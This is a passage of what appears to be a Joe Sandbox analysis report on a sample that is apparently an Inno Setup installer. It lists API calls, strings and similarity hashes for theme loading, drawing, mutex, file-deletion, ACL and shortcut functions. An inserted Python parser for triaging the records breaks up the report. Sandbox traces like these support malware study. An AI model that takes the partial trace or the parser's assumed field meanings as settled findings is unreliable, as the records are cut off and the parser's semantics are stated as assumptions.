                                                                               • Associated: 00000001.00000002.3875127821.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000001.00000002.3875164858.0000000010002000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_10000000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                              • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                              • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                              • Instruction Fuzzy Hash:
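The records above are the Joe Sandbox IDA plugin's per-function summaries: each API call with the argument snapshot and its call-site address (`ref`), the memory dump the function was lifted from (the `Offset` is the module base), and the opcode and instruction hashes under `Similarity`. Below is an added parser for this record layout (example code, not part of the report or of Joe Sandbox) that turns such records into structured objects and pulls out two things worth checking first when triaging: each function's own call order, and LoadLibraryA/GetProcAddress pairs, the shape of a dynamic import resolver. The input is a constructed excerpt copied from the directory-enumeration function (calls at 0046261C to 00462672) and the first lines of the uxtheme.dll resolver, which is left truncated as it is on the page. The assumed field semantics are that `ref` is the call site and that `Part of subcall function X` marks a call made inside the callee at X; `find_calls`, `dynamic_imports` and `by_instruction_hash` are names chosen here.

```python
"""Parser for the per-function records in a Joe Sandbox 'Similarity' listing.
Added example, not report or Joe Sandbox code.  Assumed semantics: 'ref' is the
call-site address, 'Part of subcall function X' is a call inside callee X, and
'Offset' in the Source File line is the module base."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt in the report's own layout; values copied from the report.
# The second record is truncated on purpose, as the uxtheme resolver is on the page.
SAMPLE = """\
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00462698), ref: 0046261C
• FindNextFileA.KERNEL32(000000FF,?,00000000,00462678,?,00000000,?,00000000,00462698), ref: 00462658
• FindClose.KERNEL32(000000FF,0046267F,00462678,?,00000000,?,00000000,00462698), ref: 00462672
Memory Dump Source
• Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: e94515bc2c8b3d54fda8ee7ea50903a5de584af26bf4ddc4af921dcd62f8e3d1
• Instruction ID: 64bef34161faf0391a99b618d3e767a3fd2d5c762390acd0a64fbb4d401bfb5a
• Opcode Fuzzy Hash: e94515bc2c8b3d54fda8ee7ea50903a5de584af26bf4ddc4af921dcd62f8e3d1
• Instruction Fuzzy Hash: E921D831904B147ECB11EB65DC41ADEB7ACDB49304F5084F7F808E22A1E6B89E548F5A
APIs
  • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
• LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498762), ref: 0044B67F
• GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
• GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
• GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
"""

CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$")
SOURCE_RE = re.compile(
    r"^Source File: (?P<dump>\S+), Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>\w+)$")
HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    parent: Optional[str]  # callee address when the line is 'Part of subcall function'


@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)
    dump: Optional[str] = None
    base: Optional[int] = None
    associated: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # API ID, Opcode ID, fuzzy hashes, ...

    def direct_calls(self):
        """Calls the function makes itself, in call-site address order."""
        return sorted((c for c in self.calls if c.parent is None), key=lambda c: c.ref)

    def api_names(self):
        return [c.api for c in self.direct_calls()]


def parse(text):
    """A record starts at 'APIs', or at 'Memory Dump Source' when the current record
    already has its source (functions without API calls have no 'APIs' block).
    A truncated final record is kept as far as it goes."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs" or (line == "Memory Dump Source" and cur is not None and cur.dump):
            cur = FuncRecord()
            records.append(cur)
            continue
        if cur is None:
            cur = FuncRecord()
            records.append(cur)
        if line in HEADERS:
            continue
        m = CALL_RE.match(line)
        if m:
            cur.calls.append(ApiCall(m["api"], m["module"], m["args"].split(","),
                                     int(m["ref"], 16), m["parent"]))
            continue
        m = SOURCE_RE.match(line)
        if m:
            cur.dump, cur.base = m["dump"], int(m["base"], 16)
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Associated":
            cur.associated.append(value)
        else:
            cur.meta.setdefault(key, value)
    return records


def find_calls(records, api):
    """Every direct call site of one API across the listing, as (ref, args)."""
    return [(c.ref, c.args) for r in records for c in r.direct_calls() if c.api == api]


def dynamic_imports(records):
    """Export names passed to GetProcAddress in the same function as a LoadLibraryA.
    The first GetProcAddress argument is a snapshot value (00000000 here), so the
    library is attributed by co-location in the function, not by handle."""
    out = {}
    for rec in records:
        libs = [c.args[0] for c in rec.direct_calls() if c.api == "LoadLibraryA"]
        names = [c.args[1] for c in rec.direct_calls()
                 if c.api == "GetProcAddress" and len(c.args) > 1]
        if libs and names:
            out.setdefault(libs[-1], []).extend(names)
    return out


def by_instruction_hash(records):
    """Group record indexes by 'Instruction Fuzzy Hash' to collapse duplicates."""
    groups = {}
    for i, rec in enumerate(records):
        h = rec.meta.get("Instruction Fuzzy Hash")
        if h:
            groups.setdefault(h, []).append(i)
    return groups


if __name__ == "__main__":
    recs = parse(SAMPLE)
    for i, r in enumerate(recs):
        print(i, hex(r.base) if r.base else "?", r.meta.get("API ID", ""), r.api_names())
    print(dynamic_imports(recs))
    print(find_calls(recs, "FindFirstFileA"))
```

`api_names()` deliberately leaves out the `Part of subcall function` lines, so the sequence it returns is the function's own calls and not those of its callees; the subcall lines stay available in `calls` with `parent` set. To run this over a full report, paste the whole function listing into `parse` in place of the excerpt.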
                                                                              APIs
                                                                                • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                              • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498762), ref: 0044B67F
                                                                              • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                              • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                              • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                              • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                              • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                              • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                              • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                              • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                              • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                              • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                              • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoadVersion
                                                                              • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                              • API String ID: 1968650500-2910565190
                                                                              • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                              • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                              • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                              • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0041CA40
                                                                              • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                              • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                              • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                              • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                              • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                              • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                              • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                              • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                              • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                              • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                              • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                              • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                              • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                              • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                              • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                              • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                              • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                              • String ID:
                                                                              • API String ID: 269503290-0
                                                                              • Opcode ID: 5610cf759d7025b655e2849d1764ebaab2a311e46506ba216d1aa554289a1213
                                                                              • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                              • Opcode Fuzzy Hash: 5610cf759d7025b655e2849d1764ebaab2a311e46506ba216d1aa554289a1213
                                                                              • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                              APIs
                                                                              • ShowWindow.USER32(?,00000005,00000000,004982D8,?,?,00000000,?,00000000,00000000,?,0049868F,00000000,00498699,?,00000000), ref: 00497FC3
                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004982D8,?,?,00000000,?,00000000,00000000,?,0049868F,00000000), ref: 00497FD6
                                                                              • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004982D8,?,?,00000000,?,00000000,00000000), ref: 00497FE6
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498007
                                                                              • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004982D8,?,?,00000000,?,00000000), ref: 00498017
                                                                                • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                              • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                              • API String ID: 2000705611-3672972446
                                                                              • Opcode ID: acab9580149f75eae7839736e9631fcca2424d0ecbbcfe327cba637ac9836c34
                                                                              • Instruction ID: 42a01cccdaaec234e2c43ae8d099a56eb68d33786198a0d03eeaed72e33259cf
                                                                              • Opcode Fuzzy Hash: acab9580149f75eae7839736e9631fcca2424d0ecbbcfe327cba637ac9836c34
                                                                              • Instruction Fuzzy Hash: 3991B530A046049FDF11EBA9D852BAE7BA4EB4A704F5144BBF500AB682DE7D9C05CB1D
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,0045A7E4,?,?,?,?,?,00000006,?,00000000,004973CD,?,00000000,00497470), ref: 0045A696
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                              • API String ID: 1452528299-3112430753
                                                                              • Opcode ID: 7b4c67a2979538d05da33b0281ac62305e71b724ae5420e86ae83fd1cfea1fbc
                                                                              • Instruction ID: 3d84b67d4b55823e814de2816039390ec2683d954eb16ce362ee678782389cb9
                                                                              • Opcode Fuzzy Hash: 7b4c67a2979538d05da33b0281ac62305e71b724ae5420e86ae83fd1cfea1fbc
                                                                              • Instruction Fuzzy Hash: 9A719030B002485BCB10EB698891BAE77B59F48719F54856BFC01AB383DA7CDE1D875E
                                                                              APIs
                                                                              • GetVersion.KERNEL32 ref: 0045CA2A
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CA4A
                                                                              • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CA57
                                                                              • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CA64
                                                                              • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CA72
                                                                                • Part of subcall function 0045C918: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C9B7,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C991
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC65,?,?,00000000), ref: 0045CB2B
                                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC65,?,?,00000000), ref: 0045CB34
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                              • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                              • API String ID: 59345061-4263478283
                                                                              • Opcode ID: 551fcf749c72914a38171c600357803e83c81dab8682d1b21c615cfe1b656b91
                                                                              • Instruction ID: 9267600119b74d5c47b6def8195b3f0e3f25b5cd065e112b6ecb42d85fa503a5
                                                                              • Opcode Fuzzy Hash: 551fcf749c72914a38171c600357803e83c81dab8682d1b21c615cfe1b656b91
                                                                              • Instruction Fuzzy Hash: B1518571900708EFDB11DFA9C885BAEBBB8EB4C311F14806AF915B7241C6799944CFA9
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004568A1), ref: 004565A6
                                                                              • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004568A1), ref: 004565CC
                                                                              • SysFreeString.OLEAUT32(?), ref: 00456759
                                                                              Strings
                                                                              • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004566BB
                                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566EF
                                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456790
                                                                              • CoCreateInstance, xrefs: 004565D7
                                                                              • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004567CA
                                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 0045673E
                                                                              • IPersistFile::Save, xrefs: 00456828
                                                                              • IPropertyStore::Commit, xrefs: 004567A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstance$FreeString
                                                                              • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                              • API String ID: 308859552-3936712486
                                                                              • Opcode ID: c517585abefeef5e4aecaacf0f1214f05652fa0e4087abcedef047af4287d9d3
                                                                              • Instruction ID: 8ea5dda7a560ded85d07eb9974ca036a449deae5e5e286e87ef099e1c3d3d79c
                                                                              • Opcode Fuzzy Hash: c517585abefeef5e4aecaacf0f1214f05652fa0e4087abcedef047af4287d9d3
                                                                              • Instruction Fuzzy Hash: 70A12171A00105AFDB50DFA9C885BAE77F8EF09306F55406AF904E7262DB38DD48CB69
                                                                              APIs
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                              • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                              • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                              • GetDC.USER32(00000000), ref: 0041B402
                                                                              • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                              • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                              • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                              • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                              • String ID:
                                                                              • API String ID: 644427674-0
                                                                              • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                              • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                              • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                              • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                              APIs
                                                                                • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472B74
                                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472C7B
                                                                              • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472C91
                                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472CB6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
